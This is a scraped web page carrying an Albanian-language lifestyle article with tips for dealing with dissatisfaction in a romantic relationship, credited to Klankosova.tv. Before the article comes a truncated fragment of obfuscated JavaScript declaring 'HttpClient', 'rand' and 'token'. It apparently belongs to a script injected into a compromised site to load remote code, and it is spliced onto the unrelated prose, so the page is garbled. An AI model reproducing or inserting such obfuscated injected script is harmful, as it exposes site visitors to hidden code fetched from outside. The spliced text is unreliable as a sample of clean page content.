;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Gjërat që duhet t’i bëni kur jeni të pakënaqur në një marrëdhënie

By

Nga të folurit për të deri te të provuarit e një qasjeje të re, këtu janë disa mënyra për të trajtuar pakënaqësinë në një marrëdhënie.

Një marrëdhënie kërkon shumë përpjekje dhe komunikim nga të dyja anët për t’ia dalë mbanë. Pas fazës fillestare të lumturisë, një marrëdhënie bëhet një udhëtim i gjatë i dy njerëzve që kalojnë kohë të mira dhe të këqija së bashku dhe punojnë për të në mënyrë të barabartë. Megjithatë, edhe pasi keni investuar kohë dhe emocione në marrëdhënie, ndonjëherë mund të ndieni se nuk jeni të lumtur me personin me të cilin jeni.

Andaj më poshtë i gjeni disa gjëra që duhet t’i bëni kur ndiheni të pakënaqur në një marrëdhënie.

Komunikimi: Hapi kryesor për të trajtuar pakënaqësinë në një marrëdhënie, si dhe shumicën e problemeve, është të flisni për të. Duhet të keni komunikim të qartë me partnerin për gjërat që shkaktojnë pakënaqësi dhe çfarë mund të bëhet ndryshe. Diskutimi do të ndihmojë për të pasur një perspektivë më të mirë të marrëdhënies.

Papërshtatshmëria: Duhet të keni parasysh edhe faktin që ndonjëherë njerëzit mund të jenë të mirë, por jo të përshtatshëm për ju. Ju duhet të dini se kur të hiqni dorë dhe të filloni nga e para.

Nevojat: Në marrëdhënie, një nga gabimet më të mëdha që bëni është të mendoni se lumturia dhe nevojat tuaja janë përgjegjësi e partnerëve tuaj. Megjithatë, e vërteta është se vetëm ju e keni nën kontroll këtë, përcjell Klankosova.tv

Qasja: Në rast se gjërat nuk funksionojnë për mirë edhe pas përpjekjeve, është koha të provoni një qasje të re dhe të kërkoni ndihmë nga jashtë.

Aftësia: Ndonjëherë duhet të mendoni se partneri nuk është në gjendje të ju japë atë që keni nevojë ose të përmbushë pritshmëritë tuaja në atë mënyrë që ju doni.

Rregullat: Çdo marrëdhënie ka rregullat e veta. Kur bëheni të rreptë për disa gjëra, humbisni pjesët pozitive. Është koha për t’u fokusuar në anën më të ndritshme.

Uljet dhe ngritjet: Duhet të keni parasysh gjithashtu se çdo marrëdhënie ka pjesën e saj të sfidave dhe kohëve të mira dhe ju duhet të lundroni së bashku, në vend që të luftoni gjatë gjithë kohës.

Artikuj të ngjashëm